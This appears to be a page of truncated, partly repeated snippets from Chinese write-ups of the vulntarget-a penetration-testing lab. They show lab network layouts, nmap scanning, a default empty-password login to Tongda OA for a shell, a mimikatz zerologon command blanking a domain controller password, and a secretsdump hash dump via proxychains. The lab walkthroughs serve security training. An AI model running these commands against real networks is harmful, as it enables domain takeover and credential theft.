vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。 靶场拓扑 以上拓扑图仅做参考,实战中的地址为以下配置: kali攻击机:192.168.52.128 win11攻击机:192.168.52.1 win7应用服务器:192.168.52.129,10.0.20.98 win16域成员服务器:10.0.20.99,10.0.10.111 w...
靶场地址:https://github.com/crow821/vulntarget 拓扑结构 信息收集 主机发现 netdiscover -r192.168.127.0/24-ieth0 端口扫描 nmap -A -sC-v -sV -T5-p- --script=http-enum192.168.127.130 访问目标80,发现为通达oa WIN7漏洞利用 通达oa后台getshell 默认账号admin,空密码登录后台 点击系统管理->系统参数...
lsadump::zerologon /target:10.0.10.110 /account:win2019$ /exploit (置空密码) 需要在win2016 session上配置到往10.0.10.0的路由并开socks代理 这里需要用到impacket-master工具包中的secretsdump.py获取hash值。 proxychains python3 secretsdump.py -no-pass -just-dc "vulntarget.com/win2019\$"@10.0.10.1...
Vulntarget-a靶场 靶场地址:https://github.com/shengshengli/vulntarget 靶场拓展 kali攻击机IP:192.168.31.111 win7入口:192.168.31.6 首先进行端口扫描 代码语言:javascript 复制 PORTSTATESERVICEVERSION80/tcp open http nginx|_http-title:\xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\x...
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。 靶场拓扑 以上拓扑图仅做参考,实战中的地址为以下配置: kali攻击机:192.168.52.128 win11攻击机:192.168.52.1 win7应用服务器:192.168.52.129,10.0.20.98 ...
vulntarget靶场系列-a-writeup 网络配置 外网WIN7: ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式) ip2:10.0.20.98-vmnet1(仅主机模式) 域主机成员: 10.0.20.99-vmnet1(仅主机模式) 10.0.10.111-vmnet2(仅主机模式) 域控: 10.0.10.110-vmnet2(仅主机模式)...
vulntarget靶场系列-a-writeup 网络配置 外网WIN7: ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式) ip2:10.0.20.98-vmnet1(仅主机模式) 域主机成员: 10.0.20.99-vmnet1(仅主机模式) 10.0.10.111-vmnet2(仅主机模式) 域控: 10.0.10.110-vmnet2(仅主机模式)...